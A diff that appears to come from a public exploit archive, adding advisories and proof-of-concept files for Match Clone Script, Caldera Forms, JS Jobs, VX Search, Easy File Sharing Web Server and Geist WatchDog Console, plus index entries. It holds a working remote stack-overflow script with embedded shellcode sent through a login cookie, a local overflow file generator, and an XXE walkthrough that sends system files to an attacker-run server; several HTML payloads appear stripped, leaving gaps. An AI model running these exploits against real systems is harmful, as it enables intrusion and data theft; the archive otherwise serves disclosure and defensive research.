+++ b/exploits/php/webapps/44486.txt
@@ -0,0 +1,28 @@
+########################################################################
+# Exploit Title: Match Clone Script 1.0.4 - Cross-Site Scripting
+# Date: 23.02.2018
+# Vendor Homepage: https://www.phpscriptsmall.com/
+# Software Link: https://www.phpscriptsmall.com/product/match-clone/
+# Category: Web Application
+# Exploit Author: ManhNho
+# Version: 1.0.4
+# Tested on: Window 10 / Kali Linux
+# CVE: CVE-2018-9857
+##########################################################################
+Description
+------------------------
+PHP Scripts Mall Match Clone Script 1.0.4 has XSS via the search field to
+searchbyid.php (aka the "View Search By Id" screen).
+
+Proof of Concept
+------------------------
+1. Access to site
+2. Choose “Search”
+3. Choose "View Search By Id"
+3. Put in search field
+4. You will be having a popup: ManhNho
+
+References:
+------------------------
+https://pastebin.com/Y9uEC4nu
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9857
\ No newline at end of file
diff --git a/exploits/php/webapps/44489.txt b/exploits/php/webapps/44489.txt
new file mode 100644
index 000000000..b64ed4969
--- /dev/null
+++ b/exploits/php/webapps/44489.txt
@@ -0,0 +1,159 @@
+# Exploit Title: CalderaForms 1.5.9.1 - multiple XSS
+# Date: 02-03-2018
+# Exploit Author: Federico Scalco
+# fscalco at mentat dot is
+# @mindpr00f
+# Vendor Homepage: https://calderaforms.com/
+# Software Link: https://wordpress.org/plugins/caldera-forms/
+# Vulnerable App: https://github.com/CalderaWP/Caldera-Forms/archive/1.5.9.1.zip
+# Version: 1.5.9.1 (older versions may also be affected)
+# Tested on: WordPress 4.9.4
+# CVE : CVE-2018-7747
+
+
+
+1) SOFTWARE DESCRIPTION
+"Caldera Form is a free and powerful WordPress plugin that creates
+responsive forms with a simple drag and drop editor."
+It is reported to have 100,000+ active installations at the moment of this
+writing.
+
+
+
+2) VULNERABILITY OVERVIEW
+The application fails to validate user-supplied input, hence it stores the
+unsanitized buffer in the database.
+The vulnerabilities reported here will be exploitable ONLY if certain
+conditions are met, which is not the case in a CF's default configuration
+(although still being vulnerable).
+
+A note on buffers containing strings:
+ single (') and double (") quotes are correctly escaped, backticks (`)
+are not.
+
+
+
+3) DETAILS
+
+3.a) Stored XSS - public
+When submitting a CF form, the plugin will show a greeting message to
+notify the user that everything went ok.
+This message is editable by the site's admin and can contain part of the
+user-supplied data (e.g. they're first name). In this case, simply inject
+HTML code into the parameter which gets returned in the greeting message
+and submit the POST request. A JSON response will follow, containing, among
+other data:
+- the greeting message ("html", which contains the malicious payload that
+gets executed right away)
+- form's ID ("form_id")
+- data's ID ("cf_id")
+
+{
+ "data":{"cf_id":""},
+ "html":"",
+ "type":"...",
+ "form_id":"",
+ "form_name":"...",
+ "status":"..."
+}
+
+At this point, to reach the stored XSS, simply build a GET request using
+the obtained data.
+The malicious payload will be found at
+
+ http(s):///cf-api//?cf_su=1&cf_id=
+
+Vulnerable config:
+ - form > form settings > capture entries > checked (ON by default)
+ - form > form settings > success message > add some of the user
+supplied fields (absent by default)
+
+To replicate this on a fresh install:
+ - Create a new, default, contact form
+ - Go to "Form Settings" tab and edit the success message to include,
+for example, the user's first name.
+e.g.: Form has been successfully submitted. Thank you %first_name%.
+ - Save & publish
+ - As an unauthenticated user, submit the contact form injecting HTML
+code in first name's parameter. XSS will be triggered right away
+ - To recall the payload as a stored XSS, read the POST's response and
+point your browser to
+ /cf-api//?cf_su=1&cf_id=
+
+
+
+3.b) Stored XSS - admin interface
+CalderaForms gives the ability to notify the admin via email everytime a
+form gets submitted.
+Furthermore, an admin can choose to enable an "email transacion log" for
+debugging purposes (disabled by default).
+If this configuration is in place, a copy of the malicious payload
+described above will be shown in the administration panel, when visiting
+that form's malicious entry's details.
+
+Vulnerable config:
+ - form > form settings > capture entries > checked (ON by default)
+ - form > email > debug mailer > checked (OFF by default)
+
+To replicate this on a fresh install:
+ - Enable the transaction log (form -> edit -> email tab -> check
+"Enable email send transaction log")
+ - Replicate the injection described at 3.a (all fields can be used this
+time) as an unauthenticated user
+ - Back again in the admin interface, visit form's entries, identify the
+malicious one and click on the "view" button
+
+ This will pop a details window and trigger the XSS.
+
+
+
+3.c) Importing a weaponized form - admin interface
+CalderaForms gives the ability to import a form (JSON format).
+A malicious form field can be crafted which will trigger an XSS when said
+field gets displayed/edited after the import.
+
+It's worth noting that this flaw does not depend on custom configurations,
+although it's not "remotely" and "automatically" exploitable. The problem
+here arise, for example, when an admin imports a malicious JSON.
+
+To replicate this on a fresh install:
+ - Create a form and export it (JSON format)
+ - Edit the json and inject HTML code. "label" and "slug" parameters
+were tested, others may be vulnerable too.
+ e.g.:
+ {
+ ...
+ "label":"First Name",
+ "slug":"first_name\"/>"
+ ...
+ }
+
+ - Import the malicious form to trigger the XSS in the administration
+interface
+
+
+
+4) REMEDIATION
+Update to the latest version available.
+
+If any personalized configuration is found exploitable, the following steps
+can be followed, as a temporary mitigation strategy, if no update is
+available or updating is not an option, for whatever reason:
+ - for every form, under "Form Settings", prune every variable that gets
+returned to the user as a success message
+ - for every form, under the "Email" tab, un-check "Enable email send
+transaction log"
+ - for every form that gets imported perform a thorough review
+
+
+
+5) TIMELINE & FINAL NOTES
+
+ 02-03-18 > vendor gets notified
+ 06-03-18 > vendor replies
+ 07-03-18 > CVE requested and assigned
+ 27-03-18 > patch released
+ 27-03-18 > vulnerability disclosed
+
+Special thanks go to Josh Pollock and his team, from Caldera, who invested
+passion and energy in understanding and patching these issues.
\ No newline at end of file
diff --git a/exploits/php/webapps/44492.txt b/exploits/php/webapps/44492.txt
new file mode 100644
index 000000000..85860053c
--- /dev/null
+++ b/exploits/php/webapps/44492.txt
@@ -0,0 +1,68 @@
+#######################################
+# Exploit Title: Joomla! Component Js Jobs - Multiple Cross Site Request Forgery Vulnerabilities
+# Google Dork: N/A
+# Date: 17-04-2018
+#######################################
+# Exploit Author: Sureshbabu Narvaneni#
+#######################################
+# Author Blog : http://nullnews.in
+# Vendor Homepage: https://www.joomsky.com
+# Software Link: https://extensions.joomla.org/extension/js-jobs/
+# Affected Version: 1.2.0
+# Category: WebApps
+# Tested on: Win7 Enterprise x86/Kali Linux 4.12 i686
+# CVE : NA
+#######################################
+
+1. Vendor Description:
+
+JS Jobs for any business, industry body or staffing company wishing to
+establish a presence on the internet. JS Jobs allows you to run your own,
+unique jobs classifieds service where you or employer can advertise their
+jobs and job seekers can upload their Resumes.
+
+2. Technical Description:
+
+The state changing actions in JS Jobs before 1.2.1 not having any random
+token validation which results in Cross Site Request Forgery Vulnerability.
+
+3. Proof of Concept:
+
+Delete Job Entry [Super Admin Access]
+
+
+
+
+
+
+
+
+4. Solution:
+
+Update to latest version
+
+https://extensions.joomla.org/extension/js-jobs/
\ No newline at end of file
diff --git a/exploits/windows/dos/44494.py b/exploits/windows/dos/44494.py
new file mode 100755
index 000000000..afc110c3e
--- /dev/null
+++ b/exploits/windows/dos/44494.py
@@ -0,0 +1,23 @@
+#!/usr/bin/python
+# Title: VX Search 10.6.18 Local Buffer Overflow
+# Author: Kevin McGuigan
+# Twitter: @_h3xagram
+# Author Website: https://www.7elements.co.uk
+# Vendor Website: http://www.vxsearch.com
+# Version: 10.6.18
+# Date: 18/04/2018
+# Tested on: Windows 7 32-bit
+# Vendor did not respond to advisory.
+
+# Copy the contents of vxsearchpoc.txt, click the Server icon and paste into the directory field.
+
+filename="vxsearchPOC.txt"
+junk = "A"*271
+#0x652c2a1a : "jmp esp" | asciiprint,ascii {PAGE_READONLY}[QtGui4.dll] ASLR: False, Rebase: False, SafeSEH: False, OS:False, v4.3.4.0 (C:\Program Files\VX SearchServer\bin\QtGui4.dll)
+#eip="\x1a\x2a\x2c\x65"
+eip = "B" * 4
+fill = "C" *900
+buffer = junk + eip + fill
+textfile = open(filename , 'w')
+textfile.write(buffer)
+textfile.close()
\ No newline at end of file
diff --git a/exploits/windows/remote/44485.py b/exploits/windows/remote/44485.py
new file mode 100755
index 000000000..e0fe1aa14
--- /dev/null
+++ b/exploits/windows/remote/44485.py
@@ -0,0 +1,67 @@
+# Exploit Title: Easy File Sharing Web Server 7.2 stack buffer overflow
+# Date: 03/24/2018
+# Exploit Author: rebeyond - http://www.rebeyond.net
+# Vendor Homepage: http://www.sharing-file.com/
+# Software Link: http://www.sharing-file.com/efssetup.exe
+# Version: 7.2
+# CVE: CVE-2018-9059
+# Tested on: Windows XP Professional SP3
+#
+# Description:
+# Attackers just need to construct a malicious login request packet,and send the packet to the server.The server can be pwned
+#
+#
+# The stack trace is as follows:
+# (40d8.2980): Access violation - code c0000005 (first chance)
+# r
+# eax=41414141 ebx=00000001 ecx=ffffffff edx=08fb62a0 esi=08fb6280 edi=08fb62a0
+# eip=61c277f6 esp=08fb61fc ebp=08fb6214 iopl=0 nv up ei pl nz na pe nc
+# cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
+# *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\EFS Software\Easy File Sharing Web Server\sqlite3.dll -
+# sqlite3!sqlite3_errcode+0x8e:
+# 61c277f6 81784c97a629a0 cmp dword ptr [eax+4Ch],0A029A697h ds:002b:4141418d=????????
+#
+# kb
+# ChildEBP RetAddr Args to Child
+# WARNING: Stack unwind information not available. Following frames may be wrong.
+# 083b6214 61c6286c 00001183 0000115d 085c4d44 sqlite3!sqlite3_errcode+0x8e
+# *** WARNING: Unable to verify checksum for fsws.exe
+# *** ERROR: Module load completed but symbols could not be loaded for fsws.exe
+# 083b6254 004968f4 00000001 00000000 083b6280 sqlite3!sqlite3_declare_vtab+0x3282
+# 083b6274 004975a3 083b6298 00000000 083b75fc fsws+0x968f4
+# 00000000 00000000 00000000 00000000 00000000 fsws+0x975a3
+
+
+import requests
+host='192.168.50.30'
+port='80'
+
+buf='A'*4071
+buf +='\x12\x45\xfa\x7f' #jmp esp
+buf +='A'*12
+buf +='\xeb\x36' #jmp 0x36
+buf +='A'*42
+buf +='\x60\x30\xc7\x61'*2 #must be valid address
+buf +='A'*4
+#shellcode to execute calc.exe on remote server
+buf += "\xdb\xdc\xd9\x74\x24\xf4\x58\xbb\x24\xa7\x26\xec\x33"
+buf += "\xc9\xb1\x31\x31\x58\x18\x03\x58\x18\x83\xe8\xd8\x45"
+buf += "\xd3\x10\xc8\x08\x1c\xe9\x08\x6d\x94\x0c\x39\xad\xc2"
+buf += "\x45\x69\x1d\x80\x08\x85\xd6\xc4\xb8\x1e\x9a\xc0\xcf"
+buf += "\x97\x11\x37\xe1\x28\x09\x0b\x60\xaa\x50\x58\x42\x93"
+buf += "\x9a\xad\x83\xd4\xc7\x5c\xd1\x8d\x8c\xf3\xc6\xba\xd9"
+buf += "\xcf\x6d\xf0\xcc\x57\x91\x40\xee\x76\x04\xdb\xa9\x58"
+buf += "\xa6\x08\xc2\xd0\xb0\x4d\xef\xab\x4b\xa5\x9b\x2d\x9a"
+buf += "\xf4\x64\x81\xe3\x39\x97\xdb\x24\xfd\x48\xae\x5c\xfe"
+buf += "\xf5\xa9\x9a\x7d\x22\x3f\x39\x25\xa1\xe7\xe5\xd4\x66"
+buf += "\x71\x6d\xda\xc3\xf5\x29\xfe\xd2\xda\x41\xfa\x5f\xdd"
+buf += "\x85\x8b\x24\xfa\x01\xd0\xff\x63\x13\xbc\xae\x9c\x43"
+buf += "\x1f\x0e\x39\x0f\x8d\x5b\x30\x52\xdb\x9a\xc6\xe8\xa9"
+buf += "\x9d\xd8\xf2\x9d\xf5\xe9\x79\x72\x81\xf5\xab\x37\x7d"
+buf += "\xbc\xf6\x11\x16\x19\x63\x20\x7b\x9a\x59\x66\x82\x19"
+buf += "\x68\x16\x71\x01\x19\x13\x3d\x85\xf1\x69\x2e\x60\xf6"
+buf += "\xde\x4f\xa1\x95\x81\xc3\x29\x74\x24\x64\xcb\x88"
+
+cookies = dict(SESSIONID='6771', UserID=buf,PassWD='')
+data=dict(frmLogin='',frmUserName='',frmUserPass='',login='')
+requests.post('http://'+host+':'+port+'/forum.ghp',cookies=cookies,data=data)
\ No newline at end of file
diff --git a/exploits/xml/webapps/44493.txt b/exploits/xml/webapps/44493.txt
new file mode 100644
index 000000000..e15eca059
--- /dev/null
+++ b/exploits/xml/webapps/44493.txt
@@ -0,0 +1,97 @@
+# Exploit Author: bzyo
+# CVE: CVE-2018-10077, CVE-2018-10078, CVE-2018-10079
+# Twitter: @bzyo_
+# Exploit Title: Geist WatchDog Console 3.2.2 - Multiple Vulnerabilities
+# Date: 04-17-18
+# Vulnerable Software: WatchDog Console - 3.2.2
+# Vendor Homepage: http://www.itwatchdogs.com/
+# Version: 3.2.2
+# Software Link: http://www.itwatchdogs.com/userfiles/file/firmware/Console/WatchDogConsoleInstaller_v3.2.2.exe
+# Tested On: Windows 7 x86
+
+Description
+-----------------------------------------------------------------
+WatchDog Console suffers from multiple vulnerabilities:
+
+# CVE-2018-10077 Authenticated XML External Entity (XXE)
+# CVE-2018-10078 Authenticated Stored Cross Site Scripting (XSS)
+# CVE-2018-10079 Insecure File Permissions
+
+Prerequisites
+-----------------------------------------------------------------
+To successfully exploit these vulnerabilities, an attacker must already have access
+to a system running WatchDog Console using a low-privileged user account
+
+Proof of Concepts
+-----------------------------------------------------------------
+### CVE-2018-10079 Insecure File Permissions ###
+By default, WatchDog Console 3.2.2 installs all configuration data at 'C:\ProgramData\WatchDog Console' and
+gives 'Authenticated Users' group Modify permissions
+
+C:\>icacls "c:\ProgramData\WatchDog Console"
+c:\ProgramData\WatchDog Console NT AUTHORITY\Authenticated Users:(OI)(CI)(M,DC)
+
+This allows any local user of the system the ability to reset the application admin password by generating
+a password using the PHP md5() function and updating the config.xml file. It also provides the ability to
+add data to servers.xml for both CVE-2018-10078 and CVE-2018-10079 or through the application interface
+
+### CVE-2018-10077 Authenticated XML External Entity (XXE) ###
+With authenticated admin access to the application or local access to the system, a user has the ability to read
+system files remotely through XXE
+
+On attacking machine
+- Create data.xml with following contents in apache root and start apache listening on 80
+
+
+
+ %sp;
+ %param1;
+ ]>
+ &exfil;
+
+- Create evil.xml with the following contents anywhere
+
+
+ ">
+
+- Start python simple http server in same directory as evil.xml, listening on 8080
+ python -m SimpleHTTPServer 8080
+
+On victim machine (1 of 2 ways)
+1. With admin access to application console, add attacking server IP address under servers tab
+or
+2. With local access to system
+ - update 'C:\ProgramData\WatchDog Console\servers.xml file' with following:
+
+
+
+
+ - restart system
+
+On attacking machine
+- Contents of 'win.ini' is outputted to console
+- evil.xml can be updated to read other sensitive files (tested reading file from admin desktop)
+
+### CVE-2018-10078 Authenticated Stored Cross Site Scripting (XSS) ###
+This application suffers from authenticated XSS on several inputs (1 of 2 ways)
+1. With admin access to application console, under servers tab
+ - add dummy IP in server name filed
+ - add "> into server description
+or
+2. With local access to system
+ - update 'C:\ProgramData\WatchDog Console\servers.xml file' with following:
+
+
+ " selEmail="True" Username="1" Password="1" left="400" top="180" />
+
+ - restart system
+
+3. popup with cookie appears when browsing from Overview, Dashboard, and Server tabs. Remains after reboot.
+
+Timeline
+---------------------------------------------------------------------
+04-14-18: Vendor notified of vulnerabilities
+04-16-18: Vendor responded "Thank you for bringing this to our attention. The product has now been End-of-life for
+several years and is no longer receiving updates."
+04-17-18: Submitted public disclosure
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index b411eb0c0..6487d1450 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -5938,6 +5938,9 @@ id,file,description,date,author,type,platform,port
44466,exploits/windows/dos/44466.txt,"Microsoft Windows - 'CiSetFileCache' TOCTOU Incomplete Fix",2018-04-16,"Google Security Research",dos,windows,
44467,exploits/windows/dos/44467.txt,"Microsoft Edge - 'OpenProcess()' ACG Bypass",2018-04-16,"Google Security Research",dos,windows,
44468,exploits/windows/dos/44468.py,"Zortam MP3 Media Studio 23.45 - Local Buffer Overflow (SEH)",2018-04-16,"Kevin McGuigan",dos,windows,
+44490,exploits/linux/dos/44490.txt,"PDFunite 0.41.0 - '.pdf' Local Buffer Overflow",2018-04-18,Hamm3r.py,dos,linux,
+44491,exploits/multiple/dos/44491.txt,"RSVG 2.40.13 / 2.42.2 - '.svg' Buffer Overflow",2018-04-18,Hamm3r.py,dos,multiple,
+44494,exploits/windows/dos/44494.py,"VX Search 10.6.18 - 'directory' Local Buffer Overflow",2018-04-18,"Kevin McGuigan",dos,windows,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -16413,7 +16416,8 @@ id,file,description,date,author,type,platform,port
44446,exploits/hardware/remote/44446.py,"F5 BIG-IP 11.6 SSL Virtual Server - 'Ticketbleed' Memory Disclosure",2017-02-14,@0x00string,remote,hardware,
44453,exploits/windows/remote/44453.md,"Microsoft Credential Security Support Provider - Remote Code Execution",2018-04-13,Preempt,remote,windows,
44473,exploits/hardware/remote/44473.txt,"D-Link DIR-615 Wireless Router - Persistent Cross Site Scripting",2018-04-17,"Sayan Chatterjee",remote,hardware,
-44482,exploits/php/remote/44482.rb,"Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasploit)",2018-04-17,"José Ignacio Rojo",remote,php,80
+44482,exploits/php/remote/44482.rb,"Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasploit)",2018-04-17,"José Ignacio Rojo",remote,php,80
+44485,exploits/windows/remote/44485.py,"Easy File Sharing Web Server 7.2 - Stack Buffer Overflow",2018-04-18,rebeyond,remote,windows,80
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -39095,6 +39099,7 @@ id,file,description,date,author,type,platform,port
44295,exploits/hardware/webapps/44295.txt,"Contec Smart Home 4.15 - Unauthorized Password Reset",2018-03-16,Z3ro0ne,webapps,hardware,
44317,exploits/hardware/webapps/44317.py,"Intelbras Telefone IP TIP200 LITE - Local File Disclosure",2018-03-20,anhax0r,webapps,hardware,
44318,exploits/php/webapps/44318.txt,"Vehicle Sales Management System - Multiple Vulnerabilities",2018-03-20,Sing,webapps,php,
+44320,exploits/hardware/webapps/44320.txt,"Coship RT3052 Wireless Router - Persistent Cross-Site Scripting",2018-03-20,"Sayan Chatterjee",webapps,hardware,
44324,exploits/multiple/webapps/44324.py,"Cisco node-jos < 0.11.0 - Re-sign Tokens",2018-03-20,zioBlack,webapps,multiple,
44328,exploits/xml/webapps/44328.py,"Hikvision IP Camera versions 5.2.0 - 5.3.9 (Builds 140721 < 170109) - Access Control Bypass",2018-03-23,Matamorphosis,webapps,xml,
44346,exploits/php/webapps/44346.rb,"ClipBucket - beats_uploader Unauthenticated Arbitrary File Upload (Metasploit)",2018-03-27,Metasploit,webapps,php,
@@ -39169,7 +39174,15 @@ id,file,description,date,author,type,platform,port
44447,exploits/php/webapps/44447.txt,"Joomla Convert Forms version 2.0.3 - Formula Injection (CSV Injection)",2018-04-12,"Sairam Jetty",webapps,php,
44448,exploits/php/webapps/44448.py,"Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC)",2018-04-13,"Vitalii Rudnykh",webapps,php,
44450,exploits/linux/webapps/44450.txt,"MikroTik 6.41.4 - FTP daemon Denial of Service PoC",2018-04-13,FarazPajohan,webapps,linux,
-44449,exploits/php/webapps/44449.rb,"Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution",2018-04-13,"Hans Topo & g0tmi1k",webapps,php,
+44449,exploits/php/webapps/44449.rb,"Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution",2018-04-13,"Hans Topo & g0tmi1k",webapps,php,
44454,exploits/php/webapps/44454.txt,"Cobub Razor 0.8.0 - SQL injection",2018-04-16,Kyhvedn,webapps,php,80
44469,exploits/jsp/webapps/44469.txt,"Sophos Cyberoam UTM CR25iNG - 10.6.3 MR-5 - Direct Object Reference",2018-04-16,Frogy,webapps,jsp,
44471,exploits/php/webapps/44471.txt,"Joomla! Component jDownloads 3.2.58 - Cross Site Scripting",2018-04-17,"Sureshbabu Narvaneni",webapps,php,
+44483,exploits/php/webapps/44483.txt,"MySQL Squid Access Report 2.1.4 - SQL Injection / Cross-Site Scripting",2018-04-18,"Keerati T.",webapps,php,80
+44484,exploits/php/webapps/44484.txt,"Rvsitebuilder CMS - Database Backup Download",2018-04-18,"Hesam Bazvand",webapps,php,
+44486,exploits/php/webapps/44486.txt,"Match Clone Script 1.0.4 - Cross-Site Scripting",2018-04-18,ManhNho,webapps,php,80
+44487,exploits/multiple/webapps/44487.txt,"Kodi 17.6 - Persistent Cross-Site Scripting",2018-04-18,"Manuel García Cárdenas",webapps,multiple,
+44488,exploits/hardware/webapps/44488.py,"Lutron Quantum 2.0 - 3.2.243 - Information Disclosure",2018-04-18,SadFud,webapps,hardware,
+44489,exploits/php/webapps/44489.txt,"WordPress Plugin Caldera Forms 1.5.9.1 - Cross-Site Scripting",2018-04-18,"Federico Scalco",webapps,php,80
+44492,exploits/php/webapps/44492.txt,"Joomla! Component JS Jobs 1.2.0 - Cross-Site Request Forgery",2018-04-18,"Sureshbabu Narvaneni",webapps,php,80
+44493,exploits/xml/webapps/44493.txt,"Geist WatchDog Console 3.2.2 - Multiple Vulnerabilities",2018-04-18,bzyo,webapps,xml,